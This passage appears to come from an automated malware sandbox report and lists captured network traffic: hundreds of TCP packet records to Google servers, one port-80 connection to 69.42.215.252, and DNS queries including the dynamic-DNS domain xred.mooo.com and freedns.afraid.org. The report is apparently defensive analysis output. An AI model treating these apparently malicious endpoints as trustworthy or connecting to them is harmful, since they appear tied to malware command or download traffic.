                                                                                                        Dec 30, 2024 11:49:21.813410997 CET49800443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:21.816807032 CET49800443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:21.816812992 CET44349800142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:21.818717003 CET49800443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:21.818721056 CET44349800142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:21.842413902 CET44349801142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:21.842492104 CET49801443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:21.918752909 CET44349797142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:21.920398951 CET44349797142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:21.920481920 CET49797443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:21.923578024 CET49801443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:21.923593044 CET44349801142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:21.923913002 CET49801443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:21.923918962 CET44349801142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:21.926872015 CET44349798142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:21.927031040 CET49798443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:21.927054882 CET44349798142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:21.927093029 CET49798443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:21.927614927 CET44349798142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:21.927654028 CET49798443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:21.927655935 CET44349798142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:21.927700043 CET49798443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:21.929661989 CET49798443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:21.929680109 CET44349798142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:21.930376053 CET49809443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:21.930397034 CET44349809142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:21.930459976 CET49809443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:21.948282003 CET49797443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:21.948312998 CET44349797142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:22.229209900 CET44349800142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:22.229254007 CET44349800142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:22.229305983 CET49800443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:22.229321003 CET44349800142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:22.229372025 CET49800443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:22.229374886 CET44349800142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:22.229588032 CET49800443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:22.246388912 CET49809443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:22.246400118 CET44349809142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:22.246959925 CET49800443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:22.246975899 CET44349800142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:22.247416019 CET49815443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:22.247462034 CET44349815142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:22.247530937 CET49815443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:22.247711897 CET49815443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:22.247725010 CET44349815142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:22.249355078 CET49816443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:22.249396086 CET44349816142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:22.249975920 CET49816443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:22.249975920 CET49816443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:22.250000954 CET44349816142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:22.386451006 CET44349801142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:22.386504889 CET44349801142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:22.386519909 CET49801443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:22.386542082 CET44349801142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:22.386555910 CET49801443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:22.386595964 CET49801443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:22.387195110 CET44349801142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:22.387243032 CET44349801142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:22.387295008 CET49801443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:22.387295008 CET49801443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:22.387695074 CET49801443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:22.387695074 CET49801443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:22.387713909 CET44349801142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:22.387768984 CET49801443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:22.388237953 CET49817443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:22.388284922 CET44349817142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:22.388441086 CET49817443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:22.388808012 CET49817443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:22.388823032 CET44349817142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:22.552365065 CET49809443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:22.552409887 CET49815443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:22.553101063 CET49816443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:22.553354979 CET49817443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:22.556936979 CET49818443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:22.557002068 CET44349818142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:22.557014942 CET49819443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:22.557066917 CET49818443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:22.557069063 CET44349819142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:22.557241917 CET49819443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:22.559190989 CET49819443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:22.559215069 CET44349819142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:22.559937954 CET49818443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:22.559963942 CET44349818142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:23.157026052 CET44349818142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:23.157139063 CET49818443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:23.157812119 CET44349818142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:23.158005953 CET49818443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:23.164098978 CET49818443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:23.164119959 CET44349818142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:23.164438009 CET44349818142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:23.164582968 CET49818443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:23.165030003 CET49818443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:23.178193092 CET44349819142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:23.178308010 CET49819443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:23.178965092 CET44349819142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:23.179069996 CET49819443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:23.182260990 CET49819443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:23.182297945 CET44349819142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:23.182687998 CET44349819142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:23.182749033 CET49819443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:23.183331966 CET49819443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:23.211332083 CET44349818142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:23.227333069 CET44349819142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:23.528867006 CET44349818142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:23.528981924 CET49818443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:23.529006958 CET44349818142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:23.529156923 CET49818443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:23.529156923 CET49818443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:23.529211044 CET44349818142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:23.529278040 CET49818443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:23.529788017 CET49828443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:23.529833078 CET44349828142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:23.529881954 CET49829443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:23.529916048 CET49828443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:23.529925108 CET44349829142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:23.529983044 CET49829443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:23.530235052 CET49829443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:23.530236006 CET49828443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:23.530246019 CET44349828142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:23.530246973 CET44349829142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:23.558171034 CET44349819142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:23.558247089 CET49819443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:23.558262110 CET44349819142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:23.558345079 CET49819443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:23.558703899 CET49819443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:23.558732033 CET44349819142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:23.558868885 CET44349819142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:23.558937073 CET49819443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:23.558985949 CET49831443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:23.559003115 CET49819443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:23.559026957 CET49832443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:23.559032917 CET44349831142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:23.559060097 CET44349832142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:23.559087992 CET49831443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:23.559117079 CET49832443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:23.559345007 CET49831443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:23.559359074 CET44349831142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:23.559371948 CET49832443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:23.559385061 CET44349832142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.138688087 CET44349828142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.138767004 CET49828443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:24.139025927 CET44349829142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.139111042 CET49829443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:24.139456034 CET44349828142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.139517069 CET49828443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:24.142965078 CET49828443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:24.142965078 CET49829443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:24.142982960 CET44349828142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.142991066 CET44349829142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.143321991 CET44349828142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.143330097 CET44349829142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.143388987 CET49829443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:24.143389940 CET49828443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:24.143728018 CET49829443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:24.143805981 CET49828443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:24.165184975 CET44349832142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.165256977 CET49832443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:24.165972948 CET44349832142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.166026115 CET49832443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:24.168324947 CET49832443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:24.168350935 CET44349832142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.168589115 CET44349832142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.168657064 CET49832443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:24.169086933 CET49832443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:24.169994116 CET44349831142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.170064926 CET49831443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:24.171375036 CET49831443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:24.171394110 CET44349831142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.171624899 CET44349831142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.171674013 CET49831443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:24.172003984 CET49831443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:24.191328049 CET44349828142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.191334009 CET44349829142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.211333036 CET44349832142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.219340086 CET44349831142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.537900925 CET44349832142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.537997961 CET49832443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:24.538022041 CET44349832142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.538070917 CET49832443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:24.538918972 CET44349832142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.538959980 CET44349832142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.539035082 CET49832443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:24.540509939 CET44349829142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.540564060 CET44349829142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.540574074 CET49829443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:24.540604115 CET44349829142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.540618896 CET49829443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:24.540656090 CET49829443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:24.540661097 CET44349829142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.540671110 CET44349829142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.540699005 CET49829443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:24.540715933 CET49829443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:24.603806973 CET49832443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:24.603836060 CET44349832142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.609163046 CET49841443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:24.609209061 CET44349841142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.609285116 CET49841443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:24.609484911 CET49841443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:24.609513998 CET44349841142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.623625040 CET44349828142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.623754025 CET49828443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:24.624869108 CET44349828142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.624927044 CET49828443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:24.624933958 CET44349828142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.624980927 CET49828443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:24.648689985 CET49829443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:24.648736000 CET44349829142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.652668953 CET49828443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:24.652719021 CET44349828142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.652734995 CET49828443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:24.652775049 CET49828443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:24.657238960 CET49842443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:24.657278061 CET44349842142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.657383919 CET49842443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:24.665616035 CET49842443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:24.665641069 CET44349842142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.673952103 CET49843443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:24.673993111 CET44349843142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.674242973 CET49843443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:24.678016901 CET49843443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:24.678035021 CET44349843142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.687251091 CET44349831142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.687297106 CET44349831142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.687361002 CET49831443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:24.687397957 CET44349831142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.687402964 CET49831443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:24.687407970 CET44349831142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.687436104 CET49831443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:24.687464952 CET49831443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:24.772524118 CET49831443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:24.772567987 CET44349831142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.778776884 CET49844443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:24.778831005 CET44349844142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.778892040 CET49844443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:24.779655933 CET49844443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:24.779669046 CET44349844142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:25.224864960 CET44349841142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:25.224952936 CET49841443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:25.302726984 CET44349842142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:25.302822113 CET49842443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:25.380853891 CET44349843142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:25.380913019 CET49843443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:25.402664900 CET44349844142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:25.402720928 CET49844443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:39.184899092 CET49844443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:39.184942961 CET44349844142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.185281038 CET49844443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:39.185287952 CET44349844142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.185703993 CET49843443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:39.185736895 CET44349843142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.185890913 CET49843443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:39.185897112 CET44349843142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.186252117 CET49842443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:39.186281919 CET44349842142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.186424971 CET49842443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:39.186431885 CET44349842142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.186548948 CET49841443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:39.186563015 CET44349841142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.186762094 CET49841443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:39.186767101 CET44349841142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.479080915 CET44349841142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.479218006 CET49841443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:39.479743958 CET44349841142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.479784012 CET44349841142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.479798079 CET49841443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:39.479832888 CET49841443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:39.486320019 CET44349842142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.486392021 CET49842443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:39.486412048 CET44349842142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.486562014 CET49842443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:39.487613916 CET44349842142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.487662077 CET44349842142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.487668991 CET49842443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:39.487735033 CET49842443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:39.671577930 CET44349843142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.671627045 CET49843443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:39.671631098 CET44349843142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.671643019 CET44349843142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.671678066 CET49843443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:39.672328949 CET44349843142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.672383070 CET49843443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:39.672390938 CET44349843142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.672404051 CET44349843142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.672431946 CET49843443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:39.672441959 CET49843443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:39.683878899 CET44349844142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.683932066 CET49844443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:39.683933973 CET44349844142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.683948040 CET44349844142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.683988094 CET49844443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:39.684003115 CET44349844142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.684050083 CET49844443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:39.684058905 CET44349844142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.684071064 CET44349844142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.684103012 CET49844443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:39.684112072 CET49844443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:39.917184114 CET4977080192.168.2.969.42.215.252
                                                                                                        Dec 30, 2024 11:49:39.917535067 CET49841443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:39.917613029 CET49843443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:39.917615891 CET49842443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:39.917639971 CET49844443192.168.2.9142.250.185.161

                                                                                                        UDP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Dec 30, 2024 11:49:17.802645922 CET4976153192.168.2.91.1.1.1
                                                                                                        Dec 30, 2024 11:49:17.810094118 CET53497611.1.1.1192.168.2.9
                                                                                                        Dec 30, 2024 11:49:18.665357113 CET5500053192.168.2.91.1.1.1
                                                                                                        Dec 30, 2024 11:49:18.672677994 CET53550001.1.1.1192.168.2.9
                                                                                                        Dec 30, 2024 11:49:18.675158024 CET6354653192.168.2.91.1.1.1
                                                                                                        Dec 30, 2024 11:49:18.682621956 CET53635461.1.1.1192.168.2.9
                                                                                                        Dec 30, 2024 11:49:18.856009960 CET6531853192.168.2.91.1.1.1
                                                                                                        Dec 30, 2024 11:49:18.863430977 CET53653181.1.1.1192.168.2.9

                                                                                                        DNS Queries

                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                        Dec 30, 2024 11:49:17.802645922 CET192.168.2.91.1.1.10x5ab4Standard query (0)docs.google.comA (IP address)IN (0x0001)false
                                                                                                        Dec 30, 2024 11:49:18.665357113 CET192.168.2.91.1.1.10x284aStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                        Dec 30, 2024 11:49:18.675158024 CET192.168.2.91.1.1.10x8fe8Standard query (0)freedns.afraid.orgA (IP address)IN (0x0001)false
                                                                                                        Dec 30, 2024 11:49:18.856009960 CET192.168.2.91.1.1.10xb3e6Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                                                                                                        DNS Answers

                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
